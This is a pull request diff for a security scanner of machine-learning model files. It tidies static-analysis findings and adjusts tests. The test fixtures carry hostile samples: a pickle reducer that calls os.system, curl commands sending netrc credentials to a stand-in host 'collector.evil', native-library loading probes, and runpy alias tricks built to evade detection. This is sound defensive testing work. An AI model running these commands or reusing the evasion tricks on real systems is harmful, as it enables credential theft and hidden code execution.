### PR TITLE
chore: resolve static analysis findings

### DIFF
--- a/modelaudit/cache/scan_results_cache.py
+++ b/modelaudit/cache/scan_results_cache.py
@@ -1375,7 +1375,7 @@ class ScanResultsCache:
             return getattr(file_stat, "st_ctime_ns", int(file_stat.st_ctime * 1_000_000_000))
 
         import ctypes
-        from ctypes import wintypes
+        import ctypes.wintypes as wintypes
 
         win_dll = ctypes.WinDLL  # type: ignore[attr-defined]
         get_last_error = ctypes.get_last_error  # type: ignore[attr-defined]
@@ -1421,7 +1421,7 @@ class ScanResultsCache:
     @staticmethod
     def _get_windows_handle_change_token(handle: int) -> int:
         import ctypes
-        from ctypes import wintypes
+        import ctypes.wintypes as wintypes
 
         class FileBasicInfo(ctypes.Structure):
             _fields_ = [

--- a/modelaudit/detectors/jit_script.py
+++ b/modelaudit/detectors/jit_script.py
@@ -169,7 +169,6 @@ _MAX_SNIPPET_PARSE_TRIM_ATTEMPTS = 8
 _MAX_DEFAULT_EMBEDDED_PYTHON_SNIPPETS = 10
 _MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPETS = 16
 _MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES = 16_384
-_MAX_PRIORITY_ALIAS_USAGE_LINES = 8
 # Each indirect-alias probe re-parses and re-resolves the whole (<=16 KiB) snippet,
 # so an unbounded loop is quadratic in the assignment count. Cap the expensive
 # probes; the cheap direct-reference fast path still runs for every assignment.
@@ -195,7 +194,6 @@ _PROVEN_HIGH_RISK_CALL_PROBES = {
         b"\nimport ctypes as __modelaudit_ctypes\n__modelaudit_ctypes.CDLL('payload.so')\n",
     ),
 }
-_PROVEN_RUNPY_CALL_PROBE = _PROVEN_HIGH_RISK_CALL_PROBES["S108"][1]
 _TYPED_PROOF_BINDING_MARKERS = (
     b".get",
     b".open",
@@ -229,11 +227,6 @@ _TYPED_PROOF_MEMBER_NAMES = frozenset(
     }
 )
 _TYPED_STATE_MEMBER_NAMES = _TYPED_PROOF_MEMBER_NAMES | frozenset({"_dlltype"})
-_DIRECT_PRIORITY_MEMBER_STATE_PATTERN = re.compile(
-    rb"\s*([A-Za-z_]\w*)\s*\.\s*("
-    + b"|".join(re.escape(member.encode("utf-8")) for member in sorted(_TYPED_STATE_MEMBER_NAMES))
-    + rb")\s*(?::[^=\n#]+)?\s*=(?!=)"
-)
 _EMBEDDED_PYTHON_BYTE_LIMIT_REASON = "jit_embedded_python_byte_limit"
 _EMBEDDED_PYTHON_SNIPPET_LIMIT_REASON = "jit_embedded_python_snippet_limit"
 _EMBEDDED_PYTHON_START_MARKERS = (
@@ -6025,7 +6018,6 @@ def _deterministically_evaluated_statement_expressions(
         try:
             subject = ast.literal_eval(statement.subject)
         except (ValueError, TypeError, SyntaxError, MemoryError, RecursionError):
-            subject = None
             subject_is_known = False
         else:
             subject_is_known = True

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1016,17 +1016,6 @@ def _redact_urls_in_text(text: str) -> str:
     return _URL_IN_TEXT_PATTERN.sub(lambda match: redact_url_for_finding(match.group()), text)
 
 
-def _bounded_url_start_before_match(data: bytes, match_start: int, scan_start: int) -> int | None:
-    scheme_marker = data.rfind(b"://", scan_start, match_start)
-    if scheme_marker < 0:
-        return None
-
-    url_start = scheme_marker
-    while url_start > scan_start and data[url_start - 1] not in _URL_TEXT_BOUNDARY_BYTES:
-        url_start -= 1
-    return url_start
-
-
 def _url_is_likely_call_endpoint(data: bytes, match_end: int, url_start: int) -> bool:
     cursor = match_end
     while cursor < url_start and data[cursor : cursor + 1] in {b" ", b"\t", b"\r", b"\n"}:
@@ -1203,29 +1192,8 @@ def _bare_endpoint_with_optional_port(data: bytes, endpoint_start: int, endpoint
 
 
 def _redacted_snippet_for_match(data: bytes, match_start: int, match_end: int, *, before: int, after: int) -> str:
-    start = max(0, match_start - before)
-    end = min(len(data), match_end + after)
-    scan_start = max(0, start - _MAX_SNIPPET_URL_EXPANSION_BYTES)
-    scan_end = min(len(data), end + _MAX_SNIPPET_URL_EXPANSION_BYTES)
-
-    url_start = _bounded_url_start_before_match(data, match_start, scan_start)
-    if url_start is not None:
-        start = min(start, url_start)
-        url_end = match_end
-        while url_end < scan_end and data[url_end] not in _URL_TEXT_BOUNDARY_BYTES:
-            url_end += 1
-        end = max(end, url_end)
-    else:
-        scheme_marker = data.find(b"://", match_end, min(len(data), match_end + after))
-        if scheme_marker >= 0:
-            url_start = scheme_marker
-            while url_start > scan_start and data[url_start - 1] not in _URL_TEXT_BOUNDARY_BYTES:
-                url_start -= 1
-            url_end = scheme_marker + 3
-            while url_end < scan_end and data[url_end] not in _URL_TEXT_BOUNDARY_BYTES:
-                url_end += 1
-            start = min(start, url_start)
-            end = max(end, url_end)
+    scan_start = max(0, match_start - before - _MAX_SNIPPET_URL_EXPANSION_BYTES)
+    scan_end = min(len(data), match_end + after + _MAX_SNIPPET_URL_EXPANSION_BYTES)
 
     match_text = data[match_start:match_end].decode("utf-8", errors="ignore")
     snippet_parts = [match_text]

--- a/modelaudit/scanners/pytorch_zip_scanner.py
+++ b/modelaudit/scanners/pytorch_zip_scanner.py
@@ -55,7 +55,6 @@ _TORCHSCRIPT_SOURCE_MAX_BYTES = 1024 * 1024
 _TORCHSCRIPT_GENERATED_CLASS_PATTERN = re.compile(r"(?m)^class\s+[A-Za-z_][A-Za-z0-9_]*\(Module\):\s*$")
 _TORCHSCRIPT_GENERATED_METHOD_PATTERN = re.compile(r"(?m)^\s+def\s+\w+\(self:\s+__torch__\.")
 _EXECUTABLE_MEMBER_PROBE_BYTES = 1024
-_PORTABLE_EXECUTABLE_MAX_PROBE_BYTES = (1024 * 1024) + 4
 _TORCHSCRIPT_FORBIDDEN_SOURCE_PATTERN = re.compile(
     r"(?im)(?:^\s*(?:import|from)\s+|\b(?:__import__|eval|exec|compile|open)\s*\(|\b(?:os|subprocess|socket|requests)\s*\.)"
 )
@@ -132,7 +131,6 @@ _PICKLE_BINARY_PROTOCOL_PREFIXES: tuple[bytes, ...] = (
 _PICKLE_DISCOVERY_SHORT_PROBE_BYTES = 16
 _JIT_SCAN_MEMBER_MAX_BYTES = 32 * 1024 * 1024
 _PICKLE_DISCOVERY_LONG_PROBE_BYTES = PROTO0_1_MAX_PROBE_BYTES
-_PYTORCH_STORAGE_BLOB_MEMBER_PATTERN = re.compile(r"^(?:.+/)?data/[0-9]+$")
 _NESTED_ZIP_HEADER_PROBE_BYTES = 4
 _ZIP_LOCAL_FILE_SIGNATURES: tuple[bytes, ...] = (b"PK\x03\x04", b"PK\x05\x06", b"PK\x07\x08")
 

--- a/packages/modelaudit-picklescan/src/modelaudit_picklescan/api.py
+++ b/packages/modelaudit-picklescan/src/modelaudit_picklescan/api.py
@@ -1347,14 +1347,22 @@ def _with_call_graph_findings(report: PickleReport) -> PickleReport:
     source_snapshot_stable = True
     callable_invocations_complete = not bool(report.metadata.get("callable_invocations_truncated"))
     non_allowlisted_global_imports_complete = not bool(report.metadata.get("non_allowlisted_global_imports_truncated"))
+    invocation_classification: (
+        tuple[
+            frozenset[int],
+            frozenset[int],
+            frozenset[tuple[str, str]],
+        ]
+        | None
+    )
     try:
-        invoked_global_positions = _invoked_global_positions(callable_invocations)
-        trusted_reconstruction_global_positions = _trusted_reconstruction_global_positions(callable_invocations)
-        trusted_reconstruction_references = _trusted_reconstruction_references(callable_invocations)
+        invocation_classification = (
+            _invoked_global_positions(callable_invocations),
+            _trusted_reconstruction_global_positions(callable_invocations),
+            _trusted_reconstruction_references(callable_invocations),
+        )
     except Exception as error:
-        invoked_global_positions = frozenset()
-        trusted_reconstruction_global_positions = frozenset()
-        trusted_reconstruction_references = frozenset()
+        invocation_classification = None
         callable_invocations_complete = False
         enrichment_errors.append(("python_import_invocation_classification", error))
     with shared_source_sensitive_caches():
@@ -1418,8 +1426,14 @@ def _with_call_graph_findings(report: PickleReport) -> PickleReport:
         source_snapshot_stable
         and callable_invocations_complete
         and non_allowlisted_global_imports_complete
+        and invocation_classification is not None
         and (inert_initialization_modules or trusted_import_references)
     ):
+        (
+            invoked_global_positions,
+            trusted_reconstruction_global_positions,
+            trusted_reconstruction_references,
+        ) = invocation_classification
         report = _without_proven_safe_import_findings(
             report,
             inert_initialization_modules,

--- a/packages/modelaudit-picklescan/tests/test_api.py
+++ b/packages/modelaudit-picklescan/tests/test_api.py
@@ -6917,6 +6917,51 @@ def test_with_call_graph_findings_keeps_import_warning_when_metadata_truncated(
     assert updated.findings == (finding,)
 
 
+def test_with_call_graph_findings_keeps_import_warning_when_invocation_classification_fails(
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:
+    def raise_classification_error(_callable_invocations: object) -> frozenset[int]:
+        raise RuntimeError("invocation classification failed")
+
+    monkeypatch.setattr(package_api, "_invoked_global_positions", raise_classification_error)
+    monkeypatch.setattr(
+        package_api,
+        "_proven_inert_initialization_modules",
+        lambda _report: frozenset({"decimal"}),
+    )
+    finding = Finding(
+        message="custom global may have been invoked",
+        severity=Severity.WARNING,
+        location="classification-error.pkl",
+        rule_code="NON_ALLOWLISTED_GLOBAL",
+        details={
+            "module": "decimal",
+            "name": "Decimal",
+            "import_reference": "decimal.Decimal",
+            "position": 0,
+        },
+    )
+    report = PickleReport(
+        source="classification-error.pkl",
+        status=ScanStatus.COMPLETE,
+        verdict=SafetyVerdict.SUSPICIOUS,
+        findings=(finding,),
+        metadata={"callable_invocations": ()},
+    )
+
+    updated = package_api._with_call_graph_findings(report)
+
+    assert updated.status == ScanStatus.INCONCLUSIVE
+    assert updated.verdict == SafetyVerdict.SUSPICIOUS
+    assert updated.findings == (finding,)
+    assert any(
+        error.exception_type == "RuntimeError"
+        and error.details["analysis"] == "python_import_invocation_classification"
+        and error.details["analysis_incomplete"] is True
+        for error in updated.errors
+    )
+
+
 def test_safe_import_suppression_does_not_cross_invocation_positions() -> None:
     reference = ("_xxsubinterpreters", "create")
     finding = Finding(

--- a/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py
+++ b/packages/modelaudit-picklescan/tests/test_call_graph_import_statements.py
@@ -31,10 +31,9 @@ import pytest
 import modelaudit_picklescan.api as api_module
 import modelaudit_picklescan.call_graph as call_graph
 from modelaudit_picklescan import PickleReport, SafetyVerdict, ScanOptions, ScanStatus, Severity, scan_bytes
-from modelaudit_picklescan.api import _RUST_EXTENSION_MODULE
 
 pytestmark = pytest.mark.skipif(
-    find_spec(_RUST_EXTENSION_MODULE) is None,
+    find_spec(api_module._RUST_EXTENSION_MODULE) is None,
     reason="Rust picklescan extension is not built",
 )
 

--- a/packages/modelaudit-picklescan/tests/test_known_size_streams.py
+++ b/packages/modelaudit-picklescan/tests/test_known_size_streams.py
@@ -15,6 +15,7 @@ from modelaudit_picklescan import PickleScanner, SafetyVerdict, ScanStatus, scan
 
 class MaliciousPayload:
     def __reduce__(self) -> tuple[object, tuple[str]]:
+        # Deliberately unsafe reducer used to verify malicious pickle handling.
         return (os.system, ("echo pwned",))
 
 
@@ -172,11 +173,11 @@ def test_scan_file_keeps_plain_descriptor_after_path_replacement(
     replacement_path.write_bytes(pickle.dumps({"safe": True}, protocol=4))
     original_is_zipfile = package_api.zipfile.is_zipfile
 
-    def replace_after_open(candidate: Any) -> bool:
+    def replace_and_check_zipfile(candidate: Any) -> bool:
         replacement_path.replace(payload_path)
         return original_is_zipfile(candidate)
 
-    monkeypatch.setattr(package_api.zipfile, "is_zipfile", replace_after_open)
+    monkeypatch.setattr(package_api.zipfile, "is_zipfile", replace_and_check_zipfile)
 
     report = scan_file(payload_path)
 
@@ -200,11 +201,11 @@ def test_scan_file_keeps_zip_descriptor_after_path_replacement(
     replacement_path.write_bytes(pickle.dumps({"safe": True}, protocol=4))
     original_is_zipfile = package_api.zipfile.is_zipfile
 
-    def replace_after_open(candidate: Any) -> bool:
+    def replace_and_check_zipfile(candidate: Any) -> bool:
         replacement_path.replace(archive_path)
         return original_is_zipfile(candidate)
 
-    monkeypatch.setattr(package_api.zipfile, "is_zipfile", replace_after_open)
+    monkeypatch.setattr(package_api.zipfile, "is_zipfile", replace_and_check_zipfile)
 
     report = scan_file(archive_path)
 

--- a/tests/detectors/test_jit_script_detector.py
+++ b/tests/detectors/test_jit_script_detector.py
@@ -10,6 +10,8 @@ import pytest
 from modelaudit.detectors import jit_script as jit_script_module
 from modelaudit.detectors.jit_script import JITScriptDetector, detect_jit_script_risks
 
+_PRIORITY_USAGE_STRESS_LINES = 10
+
 
 class TestJITScriptDetector:
     """Test the JITScriptDetector class."""
@@ -1616,9 +1618,7 @@ class TestJITScriptDetector:
         padding = padding_line * (
             jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8
         )
-        comparisons = b"".join(
-            b"c == None\n" for _index in range(jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES + 2)
-        )
+        comparisons = b"".join(b"c == None\n" for _index in range(_PRIORITY_USAGE_STRESS_LINES))
         source = b"\x00\xff" + leading_blocks + b"import ctypes as c\n" + padding + comparisons + b"c.cdll.msvcrt\n"
 
         findings = detector.scan_model(source, "pytorch", "payload.bin")
@@ -1640,7 +1640,7 @@ class TestJITScriptDetector:
         padding = padding_line * (
             jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8
         )
-        filler = filler_line * jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES
+        filler = filler_line * _PRIORITY_USAGE_STRESS_LINES
         source = b"\x00\xff" + leading_blocks + b"import ctypes as c\n" + padding + filler + b"c.cdll.msvcrt\n"
 
         findings = detector.scan_model(source, "pytorch", "payload.bin")
@@ -1659,7 +1659,7 @@ class TestJITScriptDetector:
         padding = padding_line * (
             jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8
         )
-        shadows = b"c = len\n" * jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES
+        shadows = b"c = len\n" * _PRIORITY_USAGE_STRESS_LINES
         source = (
             b"\x00\xff"
             + leading_blocks
@@ -1757,12 +1757,17 @@ class TestJITScriptDetector:
         )
         shadows = b"c = len\n" * 512
         shadow_candidate = shadows + b"import ctypes as c\nc.cdll.msvcrt\n"
-        usage_lines = jit_script_module._priority_alias_usage_lines(shadow_candidate, frozenset({b"c"}), 0)
+        usage_lines, proved_rule_codes = jit_script_module._priority_alias_usage_lines(
+            shadow_candidate,
+            frozenset({b"c"}),
+            0,
+        )
         source = b"\x00\xff" + leading_blocks + b"import ctypes as c\n" + padding + shadow_candidate
 
         findings = detector.scan_model(source, "pytorch", "payload.bin")
 
-        assert len(usage_lines) <= jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES
+        assert usage_lines == []
+        assert proved_rule_codes == frozenset()
         assert any(
             f.type == "code_execution_pattern" and f.pattern == "Native library loading detected" for f in findings
         )
@@ -1894,9 +1899,7 @@ class TestJITScriptDetector:
         padding = padding_line * (
             jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8
         )
-        safe_shadow_calls = b"".join(
-            b"a = len; a([])\n" + padding for _index in range(jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES + 2)
-        )
+        safe_shadow_calls = b"".join(b"a = len; a([])\n" + padding for _index in range(_PRIORITY_USAGE_STRESS_LINES))
         source = (
             b"\x00\xff"
             + leading_blocks
@@ -1925,7 +1928,7 @@ class TestJITScriptDetector:
             jit_script_module._MAX_PRIORITY_EMBEDDED_PYTHON_SNIPPET_BYTES // len(padding_line) + 8
         )
         safe_shadow_calls = b"".join(
-            b"    a = len; a([])\n" + padding for _index in range(jit_script_module._MAX_PRIORITY_ALIAS_USAGE_LINES + 2)
+            b"    a = len; a([])\n" + padding for _index in range(_PRIORITY_USAGE_STRESS_LINES)
         )
         source = (
             b"\x00\xff"
@@ -2857,15 +2860,15 @@ class TestJITScriptDetector:
             b"runner = True or rp.run_path\n(runner)('safe')\n",
             b"runner = print or rp.run_path\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif False:\n    if True:\n"
-            b"        runner = original\n(runner)('safe')\n",
+            + b"        runner = original\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif True:\n    pass\nelse:\n    runner = original\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif 1:\n    pass\nelse:\n    runner = original\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif False:\n    pass\nelif True:\n    pass\nelse:\n"
-            b"    runner = original\n(runner)('safe')\n",
+            + b"    runner = original\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif 'enabled':\n    pass\nelse:\n"
-            b"    runner = original\n(runner)('safe')\n",
+            + b"    runner = original\n(runner)('safe')\n",
             b"original = runner\nrunner = print\nif True:\n    pass\nelif False:\n    pass\nelse:\n"
-            b"    runner = original\n(runner)('safe')\n",
+            + b"    runner = original\n(runner)('safe')\n",
             b"if globals().get('enabled'):\n    runner = print\nelif True:\n    runner = print\n(runner)('safe')\n",
             b"getattr(object=rp, name='run_path')('safe')\n",
         ],
@@ -2885,16 +2888,18 @@ class TestJITScriptDetector:
         "late_state",
         [
             b"enabled = True\nrunner = rp.run_path if enabled else print\n"
-            b"if globals().get('safe'):\n    runner = print\n(runner)('payload.py')\n",
+            + b"if globals().get('safe'):\n    runner = print\n(runner)('payload.py')\n",
             b"from runpy import run_path as runner\nif globals().get('enabled'):\n    pass\n"
-            b"elif True:\n    runner = print\n(runner)('payload.py')\n",
-            b"from runpy import run_path as runner\noriginal = runner\nif globals().get('safe'):\n"
-            b"    runner = print\n    if globals().get('restore'):\n        runner = original\n"
-            b"else:\n    runner = print\n(runner)('payload.py')\n",
+            + b"elif True:\n    runner = print\n(runner)('payload.py')\n",
+            (
+                b"from runpy import run_path as runner\noriginal = runner\nif globals().get('safe'):\n"
+                + b"    runner = print\n    if globals().get('restore'):\n        runner = original\n"
+                + b"else:\n    runner = print\n(runner)('payload.py')\n"
+            ),
             b"from runpy import run_path as runner\nprint = runner\nif globals().get('enabled'):\n"
-            b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
+            + b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
             b"\x00\xfffrom runpy import run_path as runner\nprint = runner\nif globals().get('enabled'):\n"
-            b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
+            + b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
         ],
     )
     def test_scan_model_detects_late_alias_after_uncertain_safe_overwrite(self, late_state: bytes) -> None:
@@ -2913,13 +2918,13 @@ class TestJITScriptDetector:
         [
             b"import builtins\nbuiltins.print = False\nrunner = print or rp.run_path\n(runner)('payload.py')\n",
             b"import builtins\nvars(builtins)['print'] = False\n"
-            b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+            + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
             b"import builtins\nvars(builtins).update({'print': False})\n"
-            b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+            + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
             b"import builtins\nvars(builtins)['pri' + 'nt'] = False\n"
-            b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+            + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
             b"import builtins\nvars(builtins).update(**{'print': False})\n"
-            b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+            + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
             b"from runpy import run_path as runner\nFalse and (runner := print)\n(runner)('payload.py')\n",
             (
                 b"from runpy import run_path as runner\nclass Broken:\n"
@@ -6162,9 +6167,9 @@ class TestJITScriptDetector:
         "shadow_state",
         [
             b"class Safe:\n    @staticmethod\n    def update(*args, **kwargs):\n        pass\n"
-            b"dict = Safe\ndict.update(rp.__dict__, run_path=print)\n",
+            + b"dict = Safe\ndict.update(rp.__dict__, run_path=print)\n",
             b"import builtins as bi\nclass Safe:\n    @staticmethod\n    def update(*args, **kwargs):\n"
-            b"        pass\nbi.dict = Safe\nbuiltins.dict.update(rp.__dict__, run_path=print)\n",
+            + b"        pass\nbi.dict = Safe\nbuiltins.dict.update(rp.__dict__, run_path=print)\n",
         ],
     )
     def test_scan_model_ignores_shadowed_dict_update_before_dangerous_runpy_call(self, shadow_state: bytes) -> None:

--- a/tests/scanners/test_catboost_evidence_redaction.py
+++ b/tests/scanners/test_catboost_evidence_redaction.py
@@ -1515,7 +1515,7 @@ def test_inline_curl_heredoc_password_is_redacted(option: str, entry: str, expec
     [
         "curl --netrc-file <(echo 'machine collector.evil login alice password hunter2') https://collector.evil/upload",
         "printf 'machine collector.evil login alice password hunter2' | "
-        "curl --netrc-file - https://collector.evil/upload",
+        + "curl --netrc-file - https://collector.evil/upload",
         "curl --netrc-file - <<< 'machine collector.evil login alice password hunter2' https://collector.evil/upload",
     ],
 )

--- a/tests/scanners/test_pytorch_zip_scanner.py
+++ b/tests/scanners/test_pytorch_zip_scanner.py
@@ -2334,10 +2334,10 @@ def test_pytorch_zip_detects_compound_late_runpy_alias_restore(tmp_path: Path, r
         b"original = runner\nrunner = print\nif True:\n    pass\nelse:\n    runner = original\n(runner)('safe')\n",
         b"original = runner\nrunner = print\nif 1:\n    pass\nelse:\n    runner = original\n(runner)('safe')\n",
         b"original = runner\nrunner = print\nif False:\n    pass\nelif True:\n    pass\nelse:\n"
-        b"    runner = original\n(runner)('safe')\n",
+        + b"    runner = original\n(runner)('safe')\n",
         b"original = runner\nrunner = print\nif 'enabled':\n    pass\nelse:\n    runner = original\n(runner)('safe')\n",
         b"original = runner\nrunner = print\nif True:\n    pass\nelif False:\n    pass\nelse:\n"
-        b"    runner = original\n(runner)('safe')\n",
+        + b"    runner = original\n(runner)('safe')\n",
         b"if globals().get('enabled'):\n    runner = print\nelif True:\n    runner = print\n(runner)('safe')\n",
         b"getattr(object=rp, name='run_path')('safe')\n",
     ],
@@ -2366,16 +2366,18 @@ def test_pytorch_zip_preserves_definitely_safe_late_conditional_alias_state(tmp_
     "late_state",
     [
         b"enabled = True\nrunner = rp.run_path if enabled else print\n"
-        b"if globals().get('safe'):\n    runner = print\n(runner)('payload.py')\n",
+        + b"if globals().get('safe'):\n    runner = print\n(runner)('payload.py')\n",
         b"from runpy import run_path as runner\nif globals().get('enabled'):\n    pass\n"
-        b"elif True:\n    runner = print\n(runner)('payload.py')\n",
-        b"from runpy import run_path as runner\noriginal = runner\nif globals().get('safe'):\n"
-        b"    runner = print\n    if globals().get('restore'):\n        runner = original\n"
-        b"else:\n    runner = print\n(runner)('payload.py')\n",
+        + b"elif True:\n    runner = print\n(runner)('payload.py')\n",
+        (
+            b"from runpy import run_path as runner\noriginal = runner\nif globals().get('safe'):\n"
+            + b"    runner = print\n    if globals().get('restore'):\n        runner = original\n"
+            + b"else:\n    runner = print\n(runner)('payload.py')\n"
+        ),
         b"from runpy import run_path as runner\nprint = runner\nif globals().get('enabled'):\n"
-        b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
+        + b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
         b"\x00\xfffrom runpy import run_path as runner\nprint = runner\nif globals().get('enabled'):\n"
-        b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
+        + b"    runner = print\nelse:\n    runner = print\n(runner)('payload.py')\n",
     ],
 )
 def test_pytorch_zip_detects_late_alias_after_uncertain_safe_overwrite(tmp_path: Path, late_state: bytes) -> None:
@@ -2404,11 +2406,11 @@ def test_pytorch_zip_detects_late_alias_after_uncertain_safe_overwrite(tmp_path:
         b"import builtins\nbuiltins.print = False\nrunner = print or rp.run_path\n(runner)('payload.py')\n",
         b"import builtins\nvars(builtins)['print'] = False\nrunner = print or rp.run_path\n(runner)('payload.py')\n",
         b"import builtins\nvars(builtins).update({'print': False})\n"
-        b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+        + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
         b"import builtins\nvars(builtins)['pri' + 'nt'] = False\n"
-        b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+        + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
         b"import builtins\nvars(builtins).update(**{'print': False})\n"
-        b"runner = print or rp.run_path\n(runner)('payload.py')\n",
+        + b"runner = print or rp.run_path\n(runner)('payload.py')\n",
         b"from runpy import run_path as runner\nFalse and (runner := print)\n(runner)('payload.py')\n",
         (
             b"from runpy import run_path as runner\nclass Broken:\n"
@@ -5620,9 +5622,9 @@ def test_pytorch_zip_detects_late_runpy_call_after_unreachable_member_overwrite(
     "shadow_state",
     [
         b"class Safe:\n    @staticmethod\n    def update(*args, **kwargs):\n        pass\n"
-        b"dict = Safe\ndict.update(rp.__dict__, run_path=print)\n",
+        + b"dict = Safe\ndict.update(rp.__dict__, run_path=print)\n",
         b"import builtins as bi\nclass Safe:\n    @staticmethod\n    def update(*args, **kwargs):\n"
-        b"        pass\nbi.dict = Safe\nbuiltins.dict.update(rp.__dict__, run_path=print)\n",
+        + b"        pass\nbi.dict = Safe\nbuiltins.dict.update(rp.__dict__, run_path=print)\n",
     ],
 )
 def test_pytorch_zip_ignores_shadowed_dict_update_before_dangerous_runpy_call(

--- a/tests/scanners/test_zip_scanner.py
+++ b/tests/scanners/test_zip_scanner.py
@@ -1555,29 +1555,43 @@ def test_scan_zip_preserves_dynamic_member_risk_after_conditional_overwrite(tmp_
         "original = c.CDLL\nc.CDLL = print\nfor (c.CDLL,) in [(print,), (original,)]:\n    pass\n",
         "original = c.CDLL\nc.CDLL = print\nns = c.__dict__\nfor (ns['CDLL'],) in [(print,), (original,)]:\n    pass\n",
         "import contextlib\nwith contextlib.nullcontext(c.CDLL) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "contextlib.nullcontext = lambda ignored: real(original)\n"
-        "with contextlib.nullcontext(print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "contextlib.__dict__.update([('nullcontext', lambda **ignored: real(original))])\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "contextlib.__dict__.__ior__({'nullcontext': lambda **ignored: real(original)})\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "dict.__ior__(contextlib.__dict__, {'nullcontext': lambda **ignored: real(original)})\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "contextlib.__dict__.pop('nullcontext')\n"
-        "contextlib.__dict__.setdefault('nullcontext', lambda **ignored: real(original))\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "del contextlib.__dict__['nullcontext']\n"
-        "contextlib.__dict__.setdefault('nullcontext', lambda **ignored: real(original))\n"
-        "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n",
-        "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
-        "def enable():\n    contextlib.nullcontext = lambda ignored: real(original)\n"
-        "enable()\nwith contextlib.nullcontext(print) as c.CDLL:\n    pass\n",
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "contextlib.nullcontext = lambda ignored: real(original)\n"
+            + "with contextlib.nullcontext(print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "contextlib.__dict__.update([('nullcontext', lambda **ignored: real(original))])\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "contextlib.__dict__.__ior__({'nullcontext': lambda **ignored: real(original)})\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "dict.__ior__(contextlib.__dict__, {'nullcontext': lambda **ignored: real(original)})\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "contextlib.__dict__.pop('nullcontext')\n"
+            + "contextlib.__dict__.setdefault('nullcontext', lambda **ignored: real(original))\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "del contextlib.__dict__['nullcontext']\n"
+            + "contextlib.__dict__.setdefault('nullcontext', lambda **ignored: real(original))\n"
+            + "with contextlib.nullcontext(enter_result=print) as c.CDLL:\n    pass\n"
+        ),
+        (
+            "import contextlib\noriginal = c.CDLL\nc.CDLL = print\nreal = contextlib.nullcontext\n"
+            + "def enable():\n    contextlib.nullcontext = lambda ignored: real(original)\n"
+            + "enable()\nwith contextlib.nullcontext(print) as c.CDLL:\n    pass\n"
+        ),
     ],
 )
 def test_scan_zip_preserves_ctypes_risk_after_qualified_control_target(tmp_path: Path, mutation: str) -> None:
